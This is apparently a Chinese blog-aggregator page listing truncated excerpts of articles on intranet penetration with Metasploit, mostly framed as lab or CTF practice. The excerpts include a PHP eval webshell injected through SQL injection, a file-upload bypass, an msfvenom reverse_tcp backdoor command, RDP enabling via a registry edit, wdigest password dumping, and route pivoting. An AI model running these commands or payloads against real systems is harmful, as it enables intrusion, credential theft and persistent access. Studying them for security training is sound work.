首页
Python
Java
IOS
Andorid
NodeJS
JavaScript
HTML5
【
利用MSF实现三层网络的一次内网渗透
】的更多相关文章
利用MSF实现三层网络的一次内网渗透
目标IP192.168.31.207 很明显这是一个文件上传的靶场 白名单限制 各种尝试之后发现这是一个检测文件类型的限制 上传php大马文件后抓包修改其类型为 image/jpeg 上传大马之后发现目标是linux系统 尝试反弹一个shell成功了是www权限 查看内核版本如下 上传对应的cve进行提权 脚本如下: #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <sche…
【CTF】msf和impacket联合拿域控内网渗透-拿域控
前言 掌控安全里面的靶场内网渗透,练练手! 内网渗透拿域控 环境:http://afsgr16-b1ferw.aqlab.cn/?id=1 1.进去一看,典型的sql注入 2.测试了一下,可以爆库,也可以写一句话,并且还爆了绝对路径,直接拿shell,进入主题 ①将shell.php写入网站根目录,payload http://afsgr16-b1ferw.aqlab.cn/?id=1.1 union select 1,"<?php eval($_REQUEST[gylq]);?>&…
安全学习概览——恶意软件分析、web渗透、漏洞利用和挖掘、内网渗透、IoT安全分析、区块链、黑灰产对抗
1 基础知识1.1 网络熟悉常见网络协议:https://www.ietf.org/standards/rfcs/1.2 操作系统1.3 编程2 恶意软件分析2.1 分类2.1.1 木马2.1.2 Botnet2.1.3 挖矿2.1.4 勒索软件2.1.5 后门2.1.6 病毒2.1.7 蠕虫2.2 外部资源• VirusTotalhttps://www.virustotal.com/#/home/upload • 样本下载https://www.malware-traffic-analysis…
MSF 内网渗透笔记
进入meterpreter模式 在meterpreter中输入shell即可进入CMD窗口接着即可执行CMD命令,例如打开RDP服务REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f meterpreter模式 1.输入screenshot截个图看看主人在干什么吧. 2.wdigest //抓取明文密码(需加载m…
[内网渗透] MSF路由转发/网络代理
这里只做记录,不做详解 0x01 路由转发 已经拿到一台公网服务器: 1.1 方法1 进到meterpreter的会话: route #查看路由信息 background退出当前会话,通过会话2,转发172.17.0.0这个路由 route add 172.17.0.0 255.255.0.0 2 #添加路由至本地 route print #打印当前路由信息 到这里 pivot 已经配置好了,在 msf 里对 172.17.0.1 进行扫描(db_nmap)或者访问(psexe 模块,ssh 模…
beef + msf 实现内网渗透
在内网渗透方面,最为大众所知道的就是xp系统的ms08067漏洞,通过这个漏洞可以对未打上补丁的xp系统实现getshell, 但是经过笔者发现,这种漏洞攻击在被攻击机开上windows防火墙的时候是没用的(连ping都会被拒绝),但是arp+dns欺骗仍然是可行的 那么问题来了,我们如何通过内网欺骗来getshell? 在被攻击机开启防火墙的时候,可以看到使用ms08067漏洞未能成功利用 但是由于是内网的特性,因此我想到利用dns欺骗结合metasploit进行渗透测试. 首先内网的arp欺…
利用端口映射解决:拥有公网IP有限,内网需要访问因特网
动态端口映射: 内网中的一台电脑要访问新浪网,会向NAT网关发送数据包,包头中包括对方(就是新浪网)IP.端口和本机IP.端口,NAT网关会把本机IP.端口替换成自己的公网IP.一个未使用的端口,并且会记下这个映射关系,为以后转发数据包使用.然后再把数据发给新浪网,新浪网收到数据后做出反应,发送数据到 NAT网关的那个未使用的端口,然后NAT网关将数据转发给内网中的那台电脑,实现内网和公网的通讯.当连接关闭时,NAT网关会释放分配给这条连接的端口,以便以后的连接可以继续使用. 动态端口映…
内网渗透之权限维持 - MSF
年初九 天公生 0x034 MSF(美少妇) 启动msf msfconsole 先启动msf依赖的postgresql数据库 初始化数据库 msfdb init (要用普通用户) msf路径 /usr/share 制作后门 msfvenom msfvenom -p payload脚本 lhost=监听/攻击机ip lport=端口 -f 文件类型 -o 文件名 linux示例 msfvenom -p linux/x64/meterpreter/reverse_tcp lhost 192.168.…
内网渗透之权限维持 - MSF与cs联动
年初六 六六六 MSF和cs联动 msf连接cs 1.在队伍服务器上启动cs服务端 ./teamserver 团队服务器ip 连接密码 2.cs客户端连接攻击机 填团队服务器ip和密码,名字随便 msf将session发往cs客户端 1.cs设置监听 监听器 - add 选择payload类型和填攻击机ip,端口要对应payload类型 2.进入payload注入模块 use exploit/windows/local/payload_inject 3.设置参数 set disablepaylo…
【内网渗透】MSF的exploit和pyload的基础使用
1.连接MSF root@kali:~# msfconsole 2.显示所有攻击模块 msf > show exploits |more 3.寻找攻击模块 msf > search ms08_067 4.使用攻击模块 msf > use /exploits/windows/tftp/tftpd32_long_filename 5.显示payloads msf > show paylods 6.设置payloads msf exploit(php_cgi_arg_injection)…